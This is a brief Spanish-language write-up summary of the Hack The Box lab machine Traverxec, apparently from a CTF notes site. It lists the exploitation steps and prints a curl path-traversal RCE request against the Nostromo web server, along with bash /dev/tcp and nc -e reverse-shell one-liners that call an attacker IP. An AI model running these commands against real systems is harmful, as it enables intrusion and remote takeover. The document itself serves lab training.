Traverxec

AnteriorIrked SiguienteCronos

Última actualización hace 10 meses

Resumen de la resolución

Explotación de un servidor web Nostromo mediante el uso de un script encontrado en exploit-db
Extracción de id_rsa analizando la estructura de archivos del servidor web Nostromo
Acceso a la máquina víctima crackeando la contraseña de la id_rsa encriptada
Escalada de privilegios a root abusando de un binario journalctl on permisos configurados en el sudoers

Habilidades adquiridas

Capacidad de replicar un script de Ruby que abusa de una vulnerabilidad tipo RCE que hace uso de un path traversal mediante una petición por post con Curl

curl -s -X POST "http://10.10.10.165/.%0d./.%0d./.%0d./.%0d./bin/sh" -d '/usr/bin/ping -c 1 10.10.14.29'

Comandos y herramientas destacables

Sintáxis de nc y bash para enviar una Reverse Shell

bash -c "bash -i &> /dev/tcp/10.10.14.2/4242 0>&1"
nc -e /bin/bash 10.10.14.2 4242

Walkthrough en YouTube: